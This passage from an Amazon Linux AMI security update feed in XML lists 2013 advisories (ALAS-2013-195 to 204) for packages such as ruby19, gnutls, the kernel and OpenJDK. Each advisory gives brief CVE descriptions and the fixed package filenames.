arch="i686"><filename>Packages/mod24_ssl-2.4.4-2.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-195</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-195: medium priority package update for ruby19</title><issued date="2013-05-24 13:57:00" /><updated date="2014-09-15 23:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1821:
lib/rexml/text.rb in the REXML parser in Ruby before 1.9.3-p392 allows remote attackers to cause a denial of service (memory consumption and crash) via crafted text nodes in an XML document, aka an XML Entity Expansion (XEE) attack.
It was discovered that Ruby's REXML library did not properly restrict XML entity expansion. An attacker could use this flaw to cause a denial of service by tricking a Ruby application using REXML to read text nodes from specially-crafted XML content, which will result in REXML consuming large amounts of system memory.
914716:
CVE-2013-1821 ruby: entity expansion DoS vulnerability in REXML
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1821" title="" id="CVE-2013-1821" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby19-debuginfo" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.392-29.38.amzn1.x86_64.rpm</filename></package><package name="ruby19-libs" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.392-29.38.amzn1.x86_64.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="29.38.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-29.38.amzn1.noarch.rpm</filename></package><package name="ruby19-irb" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.392-29.38.amzn1.noarch.rpm</filename></package><package name="ruby19-devel" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.392-29.38.amzn1.x86_64.rpm</filename></package><package name="rubygems19-devel" version="1.8.23" release="29.38.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23-29.38.amzn1.noarch.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-29.38.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="29.38.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-29.38.amzn1.noarch.rpm</filename></package><package name="ruby19" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.392-29.38.amzn1.x86_64.rpm</filename></package><package name="ruby19-doc" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.392-29.38.amzn1.x86_64.rpm</filename></package><package name="rubygems19" version="1.8.23" release="29.38.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23-29.38.amzn1.noarch.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-29.38.amzn1.x86_64.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="29.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-29.38.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rake" version="0.9.2.2" release="29.38.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-29.38.amzn1.noarch.rpm</filename></package><package name="ruby19" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.392-29.38.amzn1.i686.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-29.38.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-devel-1.9.3.392-29.38.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.392-29.38.amzn1.i686.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.392-29.38.amzn1.i686.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-29.38.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-29.38.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-doc-1.9.3.392-29.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-196</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-196: important priority package update for tomcat6</title><issued date="2013-06-11 22:44:00" /><updated date="2014-09-15 23:08:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1976:
927622:
CVE-2013-1976 tomcat: Improper TOMCAT_LOG management in init script (DoS, ACE)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1976" title="" id="CVE-2013-1976" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-admin-webapps" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.37-1.1.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-197</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-197: important priority package update for gnutls</title><issued date="2013-06-11 22:44:00" /><updated date="2014-09-15 23:08:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2116:
It was discovered that the fix for the CVE-2013-1619 issue released via RHSA-2013:0588 introduced a regression in the way GnuTLS decrypted TLS/SSL encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to crash a server or client application that uses GnuTLS.
CVE-2013-1619:
It was discovered that the fix for the CVE-2013-1619 issue released via RHSA-2013:0588 introduced a regression in the way GnuTLS decrypted TLS/SSL encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to crash a server or client application that uses GnuTLS.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1619" title="" id="CVE-2013-1619" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2116" title="" id="CVE-2013-2116" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0883.html" title="" id="RHSA-2013:0883" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnutls" version="2.8.5" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.8.5-10.10.amzn1.x86_64.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.8.5-10.10.amzn1.x86_64.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.8.5-10.10.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.8.5-10.10.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.8.5-10.10.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.8.5-10.10.amzn1.i686.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.8.5-10.10.amzn1.i686.rpm</filename></package><package name="gnutls" version="2.8.5" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.8.5-10.10.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.8.5-10.10.amzn1.i686.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-guile-2.8.5-10.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-198</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-198: medium priority package update for mesa</title><issued date="2013-06-11 22:45:00" /><updated date="2014-09-15 23:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1993:
It was found that Mesa did not correctly validate messages from the X server. A malicious X server could cause an application using Mesa to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
CVE-2013-1872:
An out-of-bounds access flaw was found in Mesa. If an application using Mesa exposed the Mesa API to untrusted inputs (Mozilla Firefox does this), an attacker could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1872" title="" id="CVE-2013-1872" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1993" title="" id="CVE-2013-1993" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0897.html" title="" id="RHSA-2013:0897" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mesa-debuginfo" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mesa-debuginfo-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="mesa-libOSMesa" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mesa-libOSMesa-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="mesa-libGLU" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mesa-libGLU-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="glx-utils" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/glx-utils-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="mesa-libGL-devel" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mesa-libGL-devel-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="mesa-libGL" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mesa-libGL-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="mesa-libGLU-devel" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mesa-libGLU-devel-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="mesa-libOSMesa-devel" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mesa-libOSMesa-devel-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="glx-utils" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/glx-utils-9.0-0.8.15.amzn1.i686.rpm</filename></package><package name="mesa-libGL-devel" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/mesa-libGL-devel-9.0-0.8.15.amzn1.i686.rpm</filename></package><package name="mesa-debuginfo" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/mesa-debuginfo-9.0-0.8.15.amzn1.i686.rpm</filename></package><package name="mesa-libGL" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/mesa-libGL-9.0-0.8.15.amzn1.i686.rpm</filename></package><package name="mesa-libGLU" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/mesa-libGLU-9.0-0.8.15.amzn1.i686.rpm</filename></package><package name="mesa-libGLU-devel" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/mesa-libGLU-devel-9.0-0.8.15.amzn1.i686.rpm</filename></package><package name="mesa-libOSMesa-devel" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/mesa-libOSMesa-devel-9.0-0.8.15.amzn1.i686.rpm</filename></package><package name="mesa-libOSMesa" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/mesa-libOSMesa-9.0-0.8.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-199</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-199: medium priority package update for libtirpc</title><issued date="2013-06-11 22:45:00" /><updated date="2014-09-15 23:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1950:
A flaw was found in the way libtirpc decoded RPC requests. A specially-crafted RPC request could cause libtirpc to attempt to free a buffer provided by an application using the library, even when the buffer was not dynamically allocated. This could cause an application using libtirpc, such as rpcbind, to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1950" title="" id="CVE-2013-1950" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0884.html" title="" id="RHSA-2013:0884" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtirpc-debuginfo" version="0.2.1" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-debuginfo-0.2.1-6.8.amzn1.x86_64.rpm</filename></package><package name="libtirpc-devel" version="0.2.1" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-devel-0.2.1-6.8.amzn1.x86_64.rpm</filename></package><package name="libtirpc" version="0.2.1" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-0.2.1-6.8.amzn1.x86_64.rpm</filename></package><package name="libtirpc-devel" version="0.2.1" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-devel-0.2.1-6.8.amzn1.i686.rpm</filename></package><package name="libtirpc" version="0.2.1" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-0.2.1-6.8.amzn1.i686.rpm</filename></package><package name="libtirpc-debuginfo" version="0.2.1" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-debuginfo-0.2.1-6.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-200</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-200: medium priority package update for kernel</title><issued date="2013-06-11 22:45:00" /><updated date="2014-09-15 23:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-3235:
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-3231:
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-3224:
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
* Information leak flaws in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-3222:
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
* Information leak flaws in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-1929:
* A heap-based buffer overflow in the way the tg3 Ethernet driver parsed the vital product data (VPD) of devices could allow an attacker with physical access to a system to cause a denial of service or, potentially, escalate their privileges.
CVE-2013-1773:
Buffer overflow in the VFAT filesystem implementation in the Linux kernel before 3.3 allows local users to gain privileges or cause a denial of service (system crash) via a VFAT write operation on a filesystem with the utf8 mount option, which is not properly handled during UTF-8 to UTF-16 conversion.
916115:
CVE-2013-1773 kernel: VFAT slab-based buffer overflow
* A buffer overflow flaw was found in the way UTF-8 characters were converted to UTF-16 in the utf8s_to_utf16s() function of the Linux kernel's FAT file system implementation. A local user able to mount a FAT file system with the "utf8=1" option could use this flaw to crash the system or, potentially, to escalate their privileges.
CVE-2013-1767:
Use-after-free vulnerability in the shmem_remount_fs function in mm/shmem.c in the Linux kernel before 3.7.10 allows local users to gain privileges or cause a denial of service (system crash) by remounting a tmpfs filesystem without specifying a required mpol (aka mempolicy) mount option.
915592:
CVE-2013-1767 Kernel: tmpfs: fix use-after-free of mempolicy object
* A use-after-free flaw was found in the tmpfs implementation. A local user able to mount and unmount a tmpfs file system could use this flaw to cause a denial of service or, potentially, escalate their privileges.
CVE-2013-0914:
* An information leak was found in the Linux kernel's POSIX signals implementation. A local, unprivileged user could use this flaw to bypass the Address Space Layout Randomization (ASLR) security feature.
CVE-2012-6545:
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2012-6544:
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6544" title="" id="CVE-2012-6544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6545" title="" id="CVE-2012-6545" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0914" title="" id="CVE-2013-0914" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1767" title="" id="CVE-2013-1767" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1773" title="" id="CVE-2013-1773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1929" title="" id="CVE-2013-1929" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3222" title="" id="CVE-2013-3222" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3224" title="" id="CVE-2013-3224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3231" title="" id="CVE-2013-3231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3235" title="" id="CVE-2013-3235" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="3.4.48" release="45.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.48-45.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.48" release="45.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.48-45.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.48" release="45.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.48-45.46.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.4.48" release="45.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.48-45.46.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.4.48" release="45.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.48-45.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.48" release="45.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.48-45.46.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.48" release="45.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.48-45.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.48" release="45.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.48-45.46.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.48" release="45.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.48-45.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.4.48" release="45.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.48-45.46.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.4.48" release="45.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.48-45.46.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.4.48" release="45.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.48-45.46.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.4.48" release="45.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.48-45.46.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.48" release="45.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.48-45.46.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.48" release="45.46.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.48-45.46.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-201</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-201: low priority package update for openvpn</title><issued date="2013-06-11 22:47:00" /><updated date="2014-09-15 23:12:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2061:
960192:
CVE-2013-2061 openvpn: use of non-constant-time memcmp in HMAC comparison in openvpn_decrypt
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2061" title="" id="CVE-2013-2061" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn-debuginfo" version="2.3.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.3.1-1.7.amzn1.x86_64.rpm</filename></package><package name="openvpn" version="2.3.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.3.1-1.7.amzn1.x86_64.rpm</filename></package><package name="openvpn" version="2.3.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.3.1-1.7.amzn1.i686.rpm</filename></package><package name="openvpn-debuginfo" version="2.3.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.3.1-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-202</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-202: medium priority package update for socat</title><issued date="2013-06-20 14:13:00" /><updated date="2014-09-15 23:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-3571:
967345:
CVE-2013-3571 socat: Denial of service due to file descriptor leak
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3571" title="" id="CVE-2013-3571" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="socat" version="1.7.2.2" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/socat-1.7.2.2-1.8.amzn1.x86_64.rpm</filename></package><package name="socat-debuginfo" version="1.7.2.2" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/socat-debuginfo-1.7.2.2-1.8.amzn1.x86_64.rpm</filename></package><package name="socat-debuginfo" version="1.7.2.2" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/socat-debuginfo-1.7.2.2-1.8.amzn1.i686.rpm</filename></package><package name="socat" version="1.7.2.2" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/socat-1.7.2.2-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-203</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-203: important priority package update for nrpe</title><issued date="2013-06-20 14:14:00" /><updated date="2014-09-15 23:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1362:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362" title="" id="CVE-2013-1362" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nagios-plugins-nrpe" version="2.14" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-plugins-nrpe-2.14-3.5.amzn1.x86_64.rpm</filename></package><package name="nrpe" version="2.14" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/nrpe-2.14-3.5.amzn1.x86_64.rpm</filename></package><package name="nrpe-debuginfo" version="2.14" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/nrpe-debuginfo-2.14-3.5.amzn1.x86_64.rpm</filename></package><package name="nagios-plugins-nrpe" version="2.14" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-plugins-nrpe-2.14-3.5.amzn1.i686.rpm</filename></package><package name="nrpe" version="2.14" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/nrpe-2.14-3.5.amzn1.i686.rpm</filename></package><package name="nrpe-debuginfo" version="2.14" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/nrpe-debuginfo-2.14-3.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-204</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-204: important priority package update for java-1.7.0-openjdk</title><issued date="2013-06-20 14:14:00" /><updated date="2014-09-15 23:13:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2473:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2472:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2471:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2470:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2469:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2465:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2463:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2461:
It was discovered that the Libraries component contained certain errors related to XML security and the class loader. A remote attacker could possibly exploit these flaws to bypass intended security mechanisms or disclose potentially sensitive information and cause a denial of service.
CVE-2013-2460:
Multiple improper permission check issues were discovered in the Sound, JDBC, Libraries, JMX, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2459:
Integer overflow flaws were found in the way AWT processed certain input. An attacker could use these flaws to execute arbitrary code with the privileges of the user running an untrusted Java applet or application.
CVE-2013-2458:
